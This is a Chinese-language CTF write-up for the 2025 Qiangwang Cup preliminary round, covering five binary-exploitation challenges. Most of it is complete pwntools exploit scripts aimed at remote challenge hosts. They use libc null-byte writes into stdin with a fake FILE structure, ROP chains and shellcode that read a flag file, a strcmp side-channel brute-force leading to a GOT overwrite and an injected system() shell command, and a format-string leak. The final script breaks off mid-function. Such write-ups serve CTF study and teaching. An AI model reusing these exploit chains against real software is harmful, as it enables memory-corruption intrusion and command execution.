# 2025 强网杯初赛 Writeup
## Bph
乍一看是菜单堆,但是 create 只允许同时存在一个 note,edit 和 view 都是假的(只读 index),我一开始不确定是不是注册了什么 handler(但是我 ida 和 gdb 的结果都是一样的),token 函数可以在 libc/pie/stack 里三选一泄漏一个地址。
但是稍微尝试一下发现 create 时输入的 size 可以无限大,配合一开始的泄漏地址,那就相当于有了任意 libc 写 \x00 的原语。
这是一个很板子的问题,任意 libc 写 \x00 可以去打 stdin 实现二次的任意写,然后打 IOFILE 完成利用。当然最后一步也可以用 House of some 的板子一把梭。
from pwn import *
from sys import argv
from pwnlib.tubes.process import PIPE
# Terminal command pwntools uses when it has to open a new pane.
context.terminal = ['tmux', 'splitw', '-h']
proc = "./chall"
context.log_level = "debug"
# Point the pwntools context at the challenge binary.
context.binary = proc
elf = ELF(proc, checksec=False)
# Local run, kept for reference; the script currently targets the remote service.
#io = process(proc, stdin=PIPE, stdout=PIPE)
io=remote('8.147.130.84',28680)
libc=ELF('./libc.so.6')
def choose(idx):
    """Answer the ``Choice: `` menu prompt with the decimal form of *idx*."""
    selection = str(idx).encode()
    io.sendlineafter(b"Choice: ", selection)
def create(size,content):
    """Create a note through menu entry 1.

    *size* is sent in decimal at the ``Size: `` prompt and *content* (bytes)
    is sent as one line at the ``Content: `` prompt.
    """
    choose(1)
    answers = (
        (b"Size: ", str(size).encode()),
        (b"Content: ", content),
    )
    for prompt, reply in answers:
        io.sendlineafter(prompt, reply)
# Token prompt: send 0x27 bytes ending in "ab". Whatever the service prints
# after the echoed "ab\n" up to ".\n" is unpacked as the leaked pointer.
payload=b'a'*0x26+b'b'
io.sendlineafter(b"Please input your token: ", payload)
io.recvuntil(b"ab\n")
leak = u64(io.recvuntil(b".\n", drop=True).ljust(8, b"\x00"))
log.info(f"leak => {hex(leak)}")
# The leak is treated as free+126, which gives the libc load base.
libc_base=leak-126-libc.sym['free']
#-0x2db899
log.info(f"libc_base => {hex(libc_base)}")
sleep(1)
_IO_2_1_stdin_=libc_base+libc.sym['_IO_2_1_stdin_']
# One byte past stdin+0x38; used below as the "size" handed to create().
_IO_buf_base=_IO_2_1_stdin_+0x39
_IO_list_all=libc_base+libc.sym['_IO_list_all']
stdout_addr=libc_base+libc.sym['_IO_2_1_stdout_']
fake_file_start=_IO_list_all-0x500
sleep(1)
# Per the write-up, an oversized create() size yields a single "\x00" write at
# a chosen libc address; here that address is inside the stdin FILE object.
# NOTE(review): the content is presumably consumed through the corrupted stdin
# buffer and redirects it at stdout (+0x210 as the end) — confirm in a debugger.
create(_IO_buf_base,p64(stdout_addr)*0x4+p64(stdout_addr+0x210)+p64(0))
sleep(1)
# NOTE(review): this payload value is never sent anywhere in the visible script.
payload=p64(stdout_addr)*0x3+p64(stdout_addr+0x210)
pop_rbp=libc_base+0x28a91
magic_gadget=libc_base+0x176F3E #mov rdx,qword ptr [rax+0x38];mov rdi,rax;call qword ptr [rdx+0x20]
setcontext=libc_base+libc.sym['setcontext']+61
# Fake FILE structure; flat() places each value at its byte offset and fills
# the gaps with the filler byte.
fake_file_struct = flat(
    {
        # offset: value # field_name
        0x0: 0,                                             # _flags
        0x8: pop_rbp,                                       # _IO_read_ptr
        0x10: fake_file_start + 0x470 - 8,                         # _IO_read_end
        0x18: 1,                                    # _IO_read_base
        0x20: 0,                                             # _IO_write_base
        0x28: 1,                                             # _IO_write_ptr
        0x38: stdout_addr+0xe0-0x20,
        # unset fields between _IO_write_end (0x30) and _markers (0x60) are zero-filled by flat
        0x68: magic_gadget,                                    # _chain
        # unset fields between _fileno (0x70) and _shortbuf (0x83) are zero-filled by flat
        0x88: fake_file_start - 0xc30,                             # _lock
        # _offset (0x90) is zero-filled by flat
        0x98: stdout_addr,                                  # _codecvt
        0xa0: stdout_addr - 0x48,                            # _wide_data
        # unset fields between _freeres_list (0xa8) and _unused2 (0xc4) are zero-filled by flat
        0xd8: libc.sym['_IO_wfile_jumps'] + libc_base - 0x20  # vtable
    },
    filler=b'\x00'
)
pop_rax_ret=libc_base+0xdd237
pop_rdi_ret=libc_base+0x10f78b
pop_rsi_ret=libc_base+0x110a7d
syscall=libc_base+0x45539
# Data that follows the fake FILE: the setcontext entry, padding, the "flag"
# path string and a pointer to stdout_addr+0x160.
payload2=fake_file_struct+p64(setcontext)+b'\x00'*(0xa0-0x20-0x28)+p64(0x0)+p64(0x40)+b'flag'+b'\x00'*4+b'\x00'*0x8+p64(stdout_addr+0x160)
# ROP chain, x86-64 syscall numbers: 257 (openat) with rdi = -100 (AT_FDCWD)
# and rsi pointing at the "flag" string ...
payload2+=p64(pop_rax_ret)+p64(257)+p64(pop_rdi_ret)+p64(0xffffffffffffff9c)+p64(pop_rsi_ret)+p64(stdout_addr+0xe0+0x70)+p64(syscall)
# ... 0 (read) from fd 3 into stdout_addr ...
payload2+=p64(pop_rax_ret)+p64(0)+p64(pop_rdi_ret)+p64(3)+p64(pop_rsi_ret)+p64(stdout_addr)+p64(syscall)
# ... and 1 (write) to fd 1; rsi is left over from the read step.
payload2+=p64(pop_rax_ret)+p64(1)+p64(pop_rdi_ret)+p64(1)+p64(syscall)
io.sendafter(b'Choice: ',payload2)
io.interactive()
## adventure
先扔给 agent 逆向,在 sub_1F974 处似乎有一个 0x80 字节的溢出写,购买商品处还有整数溢出漏洞。
因此思路如下:
from pwn import *
filename = './pwn'
context.arch='amd64'
context.log_level = "debug"
context.terminal = ['tmux', 'neww']
# Set to a truthy value to run the binary locally instead of connecting out.
local = 0
# Lines recorded by leak_info(); debug() replays them before attaching gdb.
all_logs = []
elf = ELF(filename)
libc = elf.libc
if local:
    sh = process(filename)
else:
    sh = remote('47.94.205.237', 28709)
def debug(params=''):
    """Replay the recorded leaks, attach gdb to the target and wait.

    *params* is passed to ``gdb.attach`` as the gdb script. The first pid that
    ``util.proc.pidof`` reports for ``sh`` is used.
    """
    for entry in all_logs:
        success(entry)
    target_pid = util.proc.pidof(sh)[0]
    gdb.attach(target_pid, params)
    pause()
def leak_info(name, addr):
    """Log ``<name> => <hex addr>`` and remember it in ``all_logs``."""
    line = f'{name} => {hex(addr)}'
    all_logs.append(line)
    success(line)
def get_name():
    """Answer the ``Name: `` prompt with the fixed player name ``warrior``."""
    # pwntools tubes work on bytes; passing str only triggers a BytesWarning.
    sh.sendlineafter(b"Name: ", b"warrior")
def move_s():
    """Send the ``s`` command at the ``> `` prompt."""
    # bytes instead of str: avoids the pwntools BytesWarning.
    sh.sendlineafter(b"> ", b's')
def move_d():
    """Send the ``d`` command at the ``> `` prompt."""
    # bytes instead of str: avoids the pwntools BytesWarning.
    sh.sendlineafter(b"> ", b'd')
def shop(index, nums):
    """Buy *nums* units of item *index* in the shop.

    Sequence sent: ``shop``, option ``12``, the item index, the quantity, an
    empty line, then ``14`` at the next ``": "`` prompt (presumably the option
    that leaves the shop — confirm against the binary's menu).
    """
    # All prompts and replies are bytes; str would trigger a BytesWarning.
    sh.sendlineafter(b"> ", b"shop")
    sh.sendlineafter(b"option: ", b"12")
    sh.sendlineafter(b"buy : ", str(index).encode())
    sh.sendlineafter(b": ", str(nums).encode())
    sh.sendline(b'')
    sh.sendlineafter(b": ", b"14")
def shop2(index):
    """Same flow as ``shop`` but without sending a quantity.

    Sequence sent: ``shop``, option ``12``, the item index, an empty line,
    then ``14`` at the next ``": "`` prompt.
    """
    # All prompts and replies are bytes; str would trigger a BytesWarning.
    sh.sendlineafter(b"> ", b"shop")
    sh.sendlineafter(b"option: ", b"12")
    sh.sendlineafter(b"buy : ", str(index).encode())
    sh.sendline(b'')
    sh.sendlineafter(b": ", b"14")
def shop_show():
    """Open shop option ``13`` and return 6 leaked bytes as an integer.

    The 6 bytes are read right after the ``"1 gold)\\n   "`` marker and
    zero-extended to 8 bytes before unpacking. The function then answers
    ``sell: `` with ``3``, sends an empty line and ``14`` to back out.
    """
    # All prompts and replies are bytes; str would trigger a BytesWarning.
    sh.sendlineafter(b"> ", b"shop")
    sh.sendlineafter(b"option", b"13")
    sh.recvuntil(b"1 gold)\n   ")
    heap_leak = u64(sh.recv(6).ljust(8, b'\x00'))
    sh.sendlineafter(b"sell: ", b"3")
    sh.sendline(b'')
    sh.sendlineafter(b": ", b"14")
    return heap_leak
def fight_dragon():
    """Drive the ``search`` encounter with a fixed sequence of answers.

    Sends ``search``, action ``5``, item ``1``, the amount ``500000`` and
    finally item ``2``. NOTE(review): the meaning of each menu number is not
    visible in this script — confirm against the binary.
    """
    # All prompts and replies are bytes; str would trigger a BytesWarning.
    sh.sendlineafter(b"> ", b"search")
    sh.sendlineafter(b"action: ", b"5")
    sh.sendlineafter(b"item: ", b'1')
    sh.sendlineafter(b": ", b'500000')
    sh.sendlineafter(b"item: ", b"2")
def inv(payload, des):
    """Rename inventory item 4 and replace its description.

    *payload* (bytes) is sent as the new name; callers in this script pass
    0x40 filler bytes followed by an address. The 6 bytes printed after
    ``description : `` are returned as an integer, and *des* (bytes) is then
    sent as the new description.
    """
    # Prompts are bytes; str would trigger a pwntools BytesWarning.
    sh.sendlineafter(b'> ', b'inv')
    sh.sendlineafter(b"item : ", b"4")
    sh.sendlineafter(b"action: ", b'1')
    sh.sendlineafter(b"name : ", payload)
    sh.recvuntil(b"description : ")
    leak = u64(sh.recv(6).ljust(8, b'\x00'))
    sh.sendlineafter(b"New description : ", des)
    return leak
def calc_heap(addr):
    """Undo a ``value ^ (value >> 12)`` mangling of *addr*, nibble by nibble.

    The three most significant hex digits are unchanged by the mangling;
    every later digit is recovered by XOR-ing it with the already decoded
    digit three positions earlier.

    Works for any number of hex digits. The previous fixed ``range(9)``
    only handled exactly 12 digits: shorter values raised ``IndexError`` and
    longer ones were left partly undecoded.

    Returns the decoded value as a lowercase hex string without ``0x``.
    """
    nibbles = [int(digit, 16) for digit in hex(addr)[2:]]
    for i in range(len(nibbles) - 3):
        nibbles[i + 3] ^= nibbles[i]
    return "".join(format(nibble, "x") for nibble in nibbles)
def map():
    """Send the ``map`` command at the ``> `` prompt.

    NOTE(review): this name shadows the builtin ``map`` for the rest of the
    script; it is kept because callers refer to it by this name.
    """
    # bytes instead of str: avoids the pwntools BytesWarning.
    sh.sendlineafter(b"> ", b"map")
get_name()
# The write-up notes an integer overflow when buying goods; this oversized
# purchase is presumably what triggers it — TODO confirm against the binary.
shop(4, 8500600)
# Three 's' moves and one 'd' move, then the scripted fight.
move_s()
move_s()
move_s()
move_d()
fight_dragon()
# shop_show() returns 6 raw bytes from the sell list; calc_heap() decodes them
# into the heap address that the offsets below are relative to.
heap_leak = shop_show()
# leak_info("heap_leak", heap_leak)
heap_leak = int(calc_heap(heap_leak), 16)
leak_info("heap_leak", heap_leak)
# debug("b *$rebase(0x1FB13)")
# debug("b *$rebase(0x1FB50)")
shop(1, 10)
shop(2, 0x10)
# Every inv() call below sends 0x40 filler bytes followed by a target address,
# returns the 6 bytes printed as the description, and then sends `des` as the
# new description.
payload = b'a'*0x40 + p64(heap_leak - 0x3f8 + 7)
des = b'x'*10
leak = inv(payload, des=des)
# leak_info("leak", leak)
# Read a pointer into the binary and derive the code base from it.
payload = b'a'*0x40 + p64(heap_leak - 0x440)
des = b''
code_leak = inv(payload, des=des)
leak_info("code_leak", code_leak)
code_base = code_leak - 0x367b8
leak_info("code_base", code_base)
# Read a libc pointer stored at code_base + 0x372a8.
payload = b'a'*0x40 + p64(code_base + 0x372a8)
des = b'a'
libc_leak = inv(payload, des=des)
leak_info("libc_leak", libc_leak)
# Follow it to a second value that is treated as stderr to get the libc base.
payload = b'a'*0x40 + p64(libc_leak - 0x1dd0)
des = b'a'
stderr = inv(payload, des=des)
leak_info("stderr", stderr)
libc.address = stderr - 0x21b6a0
leak_info("libc.address", libc.address)
# Read a stack address stored on the heap.
payload = b'a'*0x40 + p64(heap_leak - 0x64e0)
des = b'a'
stack_leak = inv(payload, des=des)
leak_info("stack_leak", stack_leak)
# debug("b *$rebase(0x2A8E4)")
# map()
# Gadget addresses, all offsets into libc.
pop_rdi = 0x2a3e5 + libc.address
pop_rsi = 0x1518c2 + libc.address
pop_rdx_2 = 0x904a9 + libc.address
pop_rax = 0x45eb0 + libc.address
syscall = 0x91316 + libc.address
pop_rcx = 0x3d1ee + libc.address
pop_rsp = 0x35732 + libc.address
add_rsp_820 = 0x149878 + libc.address
xor_eax = 0x404f8 + libc.address
xor_edi_syscall = 0xd9c4c + libc.address
xor_edx_eax = 0xa8558 + libc.address
new_rop = stack_leak - 0xde0
# First-stage chain. Judging by the gadget names it issues read(0, buf, 0x1011)
# with buf = stack_leak-0xda8+8 — TODO confirm the gadgets' exact effect.
rop_chain = [
    xor_eax,
    pop_rsi,
    stack_leak-0xda8+8,
    xor_edx_eax,
    pop_rdx_2,
    0x1011,
    0x1011,
    xor_edi_syscall
]
# Write the chain to the stack one 8-byte slot per inv() call.
for i, gadget in enumerate(rop_chain):
    payload = b'a'*0x40 + p64(new_rop + i*8)
    des = p64(gadget)
    inv(payload, des=des)
# Overwrite the slot at stack_leak - 0x1620 with the stack-adjusting gadget;
# presumably a return address that pivots into the chain above.
rop_start = stack_leak - 0x1620
payload = b'a'*0x40 + p64(rop_start)
des = p64(add_rsp_820)
# debug("b *$rebase(0xBA84)")
inv(payload, des=des)
# Second stage: syscall 10 (mprotect on x86-64) over the page containing
# stack_leak - 0xd48 with length 0x1000 and protection 7, then jump to the
# shellcode that follows, which opens /flag, reads 0x40 bytes and writes them
# to fd 1.
final_rop = p64(pop_rax) + p64(10)
final_rop += p64(pop_rdi) + p64((stack_leak - 0xd48)&0xfffffffffffff000)
final_rop += p64(pop_rsi) + p64(0x1000)
final_rop += p64(pop_rdx_2) + p64(7)*2
final_rop += p64(syscall) + p64(stack_leak - 0xd48)
final_rop += asm(shellcraft.open("/flag"))
final_rop += asm(shellcraft.read(3, stack_leak, 0x40))
final_rop += asm(shellcraft.write(1, stack_leak, 0x40))
sh.send(final_rop)
sh.interactive()
## sockserver
出题人给了一个 webserver.py 和一个 socks5 server,socks5 server 里面自定义了一个菜单堆。
出题人给的 dockerfile 需要稍微改一下:
# Replace the original `COPY ./bin/ /home/ctf/` line with the lines below
COPY ./sockserver /home/ctf/
COPY ./webserver.py /home/ctf/
RUN mkdir /home/ctf/web
COPY ./web/index.html /home/ctf/web/
COPY ./flag /home/ctf/
COPY ./monitor.sh /home/ctf/
洞主要就是以下几个:
- delete 函数里直接对 msg_cnt 减一,这就有可能导致 msg_cnt != cur_idx。按理说这俩应该是保持一致的,而 add 函数里又只对 msg_cnt 做了检测,所以理论上可以做到无限申请 + 数组越界
- clear_all 函数会把 msg 结构体 reset,但是不会重构指针,可以做 uaf
  - tps,花了三个小时写的 poc 贴上面了,血的教训
- strcmp 可以用来侧信道 leak
- `msgbox` 数组越界写,可以改 got

这是最终封装的 exp:
from pwn import *
import time
import threading
import socket
# pwntools context: quieter logging than the other scripts, amd64 Linux target.
context.log_level = 'info'
context.arch = 'amd64'
context.os = 'linux'
# libc copy used to turn the leaked address into a base and to find system().
libc = ELF("./libc.so.6")
class SOCK5Pwn:
    """One connection to the target server plus helpers for its custom methods.

    Every helper starts with a method-selection message (version 5, one
    method) and then speaks the sub-protocol of the selected method:
    3 = add, 4 = delete, 5 = authenticate + connect request, 6 = reset.
    """

    def __init__(self, host="127.0.0.1", port=1080, retries=1):
        """Connect to ``host:port``.

        A failed connect is logged and retried up to *retries* more times;
        the last failure is re-raised. The default of one retry matches the
        previous behaviour, which was hidden in a ``while True`` loop that
        could never run a second time.
        """
        self.host = host
        self.port = port
        self.io = None
        attempts_left = retries
        while True:
            try:
                self.io = remote(self.host, self.port, timeout=10)
                break
            except Exception as e:
                if attempts_left <= 0:
                    raise
                attempts_left -= 1
                info(f"Reconnecting due to error: {e}")

    def choose(self, method):
        """Offer *method* to the server and return the method it selected.

        Returns -1 when the reply is not exactly two bytes or its version
        byte is not 5.
        """
        request = p8(5) + p8(1) + p8(method)
        self.io.send(request)
        response = self.io.recv(2)
        if len(response) != 2:
            return -1
        ver, selected = response[0], response[1]
        if ver != 5:
            return -1
        return selected

    def _add(self, msg):
        """Send *msg* through method 3.

        Returns ``None`` if the method was not accepted, ``False`` on a short
        reply, otherwise whether the status byte is 0.
        """
        res = self.choose(3)
        if res != 3: return None
        # Two bytes sent by the server before it accepts the message.
        self.io.recv(2)
        self.io.send(msg)
        result = self.io.recv(2)
        # info(f"_add result: {result.hex()}")
        if len(result) != 2: return False
        return result[1] == 0x00

    def _delete(self, msg):
        """Send *msg* through method 4; return values as for ``_add``."""
        res = self.choose(4)
        if res != 4: return None
        self.io.recv(2)
        self.io.send(msg)
        result = self.io.recv(2)
        # info(f"_delete result: {result.hex()}")
        if len(result) != 2: return False
        return result[1] == 0x00

    def _sock(self, content):
        """Authenticate with *content* via method 5 and issue a dummy request.

        Returns ``True`` only when the credential check answers with status 0
        and the following connect-style request gets a 10-byte version-5
        reply. The brute-force code uses this as its yes/no oracle.
        """
        if self.choose(5) != 5: return False
        if self.io.recv(2, timeout=3) != b'\x05\x01': return False
        self.io.send(content)
        result = self.io.recv(2)
        if len(result) != 2 or result[1] != 0x00: return False
        # Request with address type 3 (length-prefixed host name).
        req = p8(5) + p8(1) + p8(0) + p8(3)
        target_host = b'aaaaaaaa'
        req += p8(len(target_host)) + target_host
        req += p16(80)
        self.io.send(req)
        response = self.io.recv(10)
        return len(response) == 10 and response[0] == 5

    def _reset(self):
        """Invoke method 6; return whether the status byte is 0."""
        if self.choose(6) != 6: return False
        result = self.io.recv(2)
        if len(result) != 2: return False
        return result[1] == 0x00

    def system(self):
        """Send a shell command in the host-name field of a method-5 request.

        The command copies the flag into the web root. It is meant to run
        once the main script has redirected a function pointer to
        ``system`` (see the "Triggering system()" step). Returns ``True``
        when the final reply is 10 bytes, version 5, status 0.
        """
        if self.choose(5) != 5: return False
        if self.io.recv(2) != b'\x05\x01': return False
        self.io.send(b"a\x00")
        result = self.io.recv(2)
        if len(result) != 2 or result[1] != 0x00: return False
        target_host = b'cat /home/ctf/flag > /home/ctf/web/flag.html'
        req = p8(5) + p8(1) + p8(0) + p8(3)
        req += p8(len(target_host)) + target_host
        req += p16(80)
        self.io.send(req)
        response = self.io.recv(10)
        if len(response) != 10 or response[0] != 5: return False
        return response[1] == 0x00

    def close(self):
        """Close the connection if one was opened."""
        if self.io:
            self.io.close()

    def read_flag(self):
        """Proxy an HTTP GET for ``/flag.html`` through the server and log it.

        Returns ``True`` when the connect request succeeded and the response
        was read, ``False`` on any protocol mismatch.
        """
        if self.choose(5) != 5:
            return False
        ack = self.io.recv(2, timeout=2)
        if ack != b'\x05\x01':
            return False
        self.io.send(b"a\x00")
        result = self.io.recv(2, timeout=200)
        if len(result) != 2:
            return False
        # Anything other than status 0 counts as a failed authentication.
        if result[1] != 0x00:
            return False
        # NOTE(review): p32/p16 pack little-endian under the default pwntools
        # context, so "1.0.0.127" goes out as bytes 7f 00 00 01 and 37151
        # (0x911f) as bytes 1f 91 — i.e. 127.0.0.1:8081 if the server reads
        # them in network order. Confirm against the server.
        target_host = '1.0.0.127'
        target_port = 37151
        req = p8(5) + p8(1) + p8(0) + p8(1)
        ip = struct.unpack("!l", socket.inet_aton(target_host))[0]
        req += p32(ip) + p16(target_port)
        # Manual gate: wait for the operator before sending the request.
        pause()
        self.io.send(req)
        response = self.io.recv(10, timeout=200)
        if len(response) != 10:
            return False
        ver = response[0]
        rep = response[1]
        if ver != 5:
            return False
        if rep != 0x00:
            return False
        self.io.send(b"GET /flag.html HTTP/1.1\r\nHost: localhost\r\n\r\n")
        data = self.io.recvall(timeout=100)
        info(f"Received data: {data}")
        return True
def add(content):
    """Open a fresh connection, send one add request, and close it.

    Best effort: any error is swallowed so that a failed request does not
    stop the surrounding spray. The connection is now closed even when the
    request itself raises (previously the socket leaked in that case).
    """
    try:
        pwn = SOCK5Pwn()
        try:
            pwn._add(content)
        finally:
            pwn.close()
    except Exception:
        pass
def delete(content):
    """Open a fresh connection, send one delete request, and close it.

    Returns the result of ``SOCK5Pwn._delete`` or ``False`` when anything
    raised. The connection is closed even when the request raises
    (previously the socket leaked in that case).
    """
    try:
        pwn = SOCK5Pwn()
        try:
            return pwn._delete(content)
        finally:
            pwn.close()
    except Exception:
        return False
def reset():
    """Open a fresh connection, send one reset request, and close it.

    Best effort: errors are swallowed. ``except Exception`` replaces the
    bare ``except`` so that Ctrl-C and ``SystemExit`` still propagate, and
    the connection is closed even when the request raises.
    """
    try:
        pwn = SOCK5Pwn()
        try:
            pwn._reset()
        finally:
            pwn.close()
    except Exception:
        pass
def sock(content):
    """Run one ``SOCK5Pwn._sock`` probe on a fresh connection.

    Returns the probe result or ``False`` when anything raised.
    ``except Exception`` replaces the bare ``except`` so that Ctrl-C and
    ``SystemExit`` still propagate, and the connection is closed even when
    the probe raises.
    """
    try:
        pwn = SOCK5Pwn()
        try:
            return pwn._sock(content)
        finally:
            pwn.close()
    except Exception:
        return False
# Bytes recovered so far by the brute-force workers.
sol = b""
# Guards updates to `sol` from worker threads.
sol_lock = threading.Lock()
# Set by the worker that finds the current byte so the others stop early.
byte_found_event = threading.Event()
def brute_worker(byte_range):
    """Try each candidate in *byte_range* as the next byte after ``sol``.

    A candidate is accepted when ``sock(prefix + candidate + b"\\x00")`` is
    truthy. The first worker to succeed appends the byte to the shared
    ``sol`` and sets ``byte_found_event``; workers stop as soon as that
    event is set.
    """
    global sol
    prefix = sol
    for candidate in byte_range:
        if byte_found_event.is_set():
            return
        guess = prefix + p8(candidate) + b"\x00"
        if not sock(guess):
            continue
        with sol_lock:
            # Only the first finder for this position may extend `sol`.
            if len(sol) == len(prefix):
                sol += p8(candidate)
                info(f"Found byte => {hex(candidate)}")
                byte_found_event.set()
        return
def brute(num_threads=32):
    """Recover a pointer byte by byte through the ``sock()`` oracle.

    The lowest byte is assumed to be ``0x00``. The next byte is searched
    sequentially among values whose low nibble is 9, and the following four
    bytes are searched in parallel by *num_threads* workers (value 0 is
    never tried for these).

    Returns the recovered value as an integer. Reports an error and returns
    0 when the first byte cannot be found or, new in this version, when a
    later position yields no match. Previously that case was skipped
    silently and a truncated, wrong address was returned.
    """
    global sol
    sol = b""
    info("Bruting first byte...")
    # Same candidates as "j in range(256) if j % 0x10 == 9".
    for j in range(9, 256, 0x10):
        m = p8(j) + b"\x00"
        if sock(m):
            sol = p8(j)
            info(f"Found first byte => {hex(j)}")
            break
    if not sol:
        error("Failed to brute the first byte.")
        return 0
    for i in range(4):
        info(f"Bruting byte position {i+2}...")
        byte_found_event.clear()
        threads = []
        chunk_size = 256 // num_threads
        for t_id in range(num_threads):
            # Split 1..255 into contiguous slices, one per worker; the last
            # worker also takes the remainder.
            start_byte = t_id * chunk_size
            start_byte = 1 if t_id == 0 else start_byte
            end_byte = 256 if t_id == num_threads - 1 else (t_id + 1) * chunk_size
            if start_byte >= end_byte:
                continue
            thread = threading.Thread(target=brute_worker, args=(range(start_byte, end_byte),))
            threads.append(thread)
            thread.start()
        for thread in threads:
            thread.join()
        if not byte_found_event.is_set():
            # No candidate matched: stop instead of returning a short address.
            error(f"Failed to brute byte position {i+2}.")
            return 0
    final_sol = b"\x00" + sol
    res = u64(final_sol.ljust(8, b"\x00"))
    return res
def run_tasks_in_batches(tasks, max_threads=16):
    """Start and join *tasks* in consecutive groups of *max_threads*.

    Every task in a group is started before any of them is joined, and a
    group is fully joined before the next one starts. Tasks only need
    ``start()`` and ``join()`` methods.
    """
    offsets = range(0, len(tasks), max_threads)
    for group in (tasks[off:off + max_threads] for off in offsets):
        for worker in group:
            worker.start()
        for worker in group:
            worker.join()
def parallel_add(count, content, max_threads=20):
    """Issue *count* ``add(content)`` requests, *max_threads* at a time."""
    info(f"Starting {count} parallel add requests (max {max_threads} threads at a time)...")
    tasks = []
    for _ in range(count):
        tasks.append(threading.Thread(target=add, args=(content,)))
    run_tasks_in_batches(tasks, max_threads)
    info("Parallel add requests finished.")
def parallel_add_delete(count, add_content, delete_content, max_threads=20):
    """Run *count* add-then-delete pairs, *max_threads* at a time.

    Each thread first calls ``add(add_content)`` and then
    ``delete(delete_content)``.
    """
    info(f"Starting {count} parallel add/delete requests (max {max_threads} threads at a time)...")

    def add_then_delete():
        add(add_content)
        delete(delete_content)

    tasks = []
    for _ in range(count):
        tasks.append(threading.Thread(target=add_then_delete))
    run_tasks_in_batches(tasks, max_threads)
    info("Parallel add/delete requests finished.")
if __name__ == '__main__':
    # Fixed address in the (non-PIE) binary; presumably a GOT entry, since the
    # write-up mentions overwriting the GOT — TODO confirm which symbol.
    addr = 0x000000000405050
    # Stage 1: fill the message table, then add a crafted record that points
    # at addr - 1.
    parallel_add(100, b"a" * 0x20)
    add(flat([0, 103, -3, addr - 1]))
    add(b"\x00")
    reset()
    # Per the write-up, delete decrements msg_cnt unconditionally, so the
    # add/delete pairs desynchronise the counters before the next record.
    parallel_add_delete(100, b"c" * 0x20, b"b\x00")
    add(flat([0, 102, -1, -1]))
    # Stage 2: recover a libc pointer through the strcmp-based oracle.
    info("Leaking libc address...")
    leaked_addr = brute(num_threads=16)
    if leaked_addr == 0:
        error("Failed to leak address.")
        exit()
    libc.address = leaked_addr - 0x127900
    info(f"libc base => {hex(libc.address)}")
    info(f"system addr => {hex(libc.sym['system'])}")
    # Stage 3: repeat the table setup, this time planting system() - 1.
    reset()
    parallel_add(100, b"a" * 0x20)
    add(flat([0, 102, -0x104 + 1, libc.sym['system'] - 1]))
    add(b"x" * 0x20)
    # Stage 4: send the shell command, then fetch the flag over HTTP.
    info("Triggering system()...")
    pwn = SOCK5Pwn()
    if pwn.system():
        success("Command executed! Check for the flag.")
    pwn.close()
    pwn = SOCK5Pwn()
    pwn.read_flag()
    pwn.close()
由于远程环境 10s 重启一次 sockserver,因此需要打快点,这里用多线程加速爆破。
## Flagmarket
由于格式化字符串存在 bss 上,而 bss 上存在溢出写,所以可以修改格式化字符串的内容,那么只需要每次 pay 的 Money 都不是 255 就可以无限 fmt,而 flag 又是读在堆上的,所以先泄漏一次堆地址,然后读入 flag 地址再用 %s 打印即可。
from pwn import *
p = process('./chall')
# Round 1: choose option 1 and pay 255, which leads to the report prompt.
p.recvuntil(b'exit')
p.sendline(b'1')
p.recvuntil(b'?')
p.sendline(b'255')
p.recvuntil(b'opened user.log, please report:')
# 0x100 filler bytes followed by a new format string. Per the write-up the
# report overflows into the format string stored in .bss.
p.sendline(b'q' * 0x100 + b'%9$p%12$s')
# Round 2: the value sent at the '?' prompt is a packed address, so this
# round does not pay 255 again; the output after "0x" is parsed as a heap
# address.
p.recvuntil(b'exit')
p.sendline(b'1')
p.recvuntil(b'?')
# gdb.attach(p, 'b *0x4014bc')
p.sendline(p64(0x4042C8))
p.recvuntil(b'0x')
heap_addr = int(p.recvuntil(b'we')[:-2], 16)
print(f'heap_addr: {hex(heap_addr)}')
# The flag buffer is taken to be 0x1e0 bytes past the leaked heap address.
flag = heap_addr + 0x1e0
# Round 3: send the flag address so the %s conversion prints it.
p.recvuntil(b'exit')
p.sendline(b'1')
p.recvuntil(b'?')
p.sendline(p64(flag))
p.interactive()
## Filesystem
结构体如下:
/* Per-file record as recovered from the challenge binary. */
struct filesystem{
    char filename[0x30];   /* same size as the "max length = 0x30" prompt */
    char content[0xa0];    /* same size as the "max length 0xa0" prompt */
    short length;          /* presumably the content length -- confirm */
    size_t* fileptr;       /* presumably the handle of the backing file -- confirm */
};
想了半天没想出来怎么打,但是程序的 create_file 功能里面有路径穿越,可以直接根据 dockerfile 里面的程序路径覆盖程序:
from pwn import *
filename = './chall'
context.arch='amd64'
context.log_level = "debug"
context.terminal = ['tmux', 'neww']
# Set to a truthy value to run the binary locally instead of connecting out.
local = 0
# Lines recorded by leak_info(); debug() replays them before attaching gdb.
all_logs = []
elf = ELF(filename)
libc = elf.libc
if local:
    sh = process(filename)
else:
    sh = remote('8.147.135.195', 30722)
def debug(params=''):
    """Replay the recorded leaks, attach gdb to the target and wait.

    The gdb script is *params* prefixed with a command that connects the
    decompiler plugin to IDA on localhost:3662.
    """
    for entry in all_logs:
        success(entry)
    target_pid = util.proc.pidof(sh)[0]
    script = "decompiler connect ida --host localhost --port 3662\n" + params
    gdb.attach(target_pid, script)
    pause()
def leak_info(name, addr):
    """Log ``<name> => <hex addr>`` and remember it in ``all_logs``."""
    line = f'{name} => {hex(addr)}'
    all_logs.append(line)
    success(line)
def input_dirname(name):
    """Answer the ``input DirectoryName: `` prompt with *name*.

    *name* may be ``str`` or ``bytes``. ``str`` is encoded here so that
    pwntools receives bytes and does not emit a BytesWarning.
    """
    if isinstance(name, str):
        name = name.encode()
    sh.sendlineafter(b"input DirectoryName: ", name)
def creat_file(name, content):
    """Create a file through menu entry 1.

    *name* and *content* (bytes) are sent without a trailing newline at the
    filename and content prompts.
    """
    # Prompts are bytes; str would trigger a pwntools BytesWarning.
    sh.sendafter(b"> ", b"1")
    sh.sendafter(b"input filename (max length = 0x30): ", name)
    sh.sendafter(b"input content (max length 0xa0): \n", content)
def open_file(name):
    """Open the file *name* (bytes) through menu entry 2."""
    # Prompts are bytes; str would trigger a pwntools BytesWarning.
    sh.sendafter(b"> ", b"2")
    sh.sendafter(b"input filename (max length = 0x30): ", name)
def edit_file(index, content):
    """Replace the content of file number *index* through menu entry 3.

    *index* is sent in decimal as a line; *content* (bytes) is sent without
    a trailing newline.
    """
    # Prompts are bytes; str would trigger a pwntools BytesWarning.
    sh.sendafter(b"> ", b"3")
    sh.sendlineafter(b"input file idx: ", str(index).encode())
    sh.sendafter(b"input content (max length 0xa0): \n", content)
def show_file(index):
    """Request the content of file number *index* through menu entry 4."""
    # Prompts are bytes; str would trigger a pwntools BytesWarning.
    sh.sendafter(b"> ", b"4")
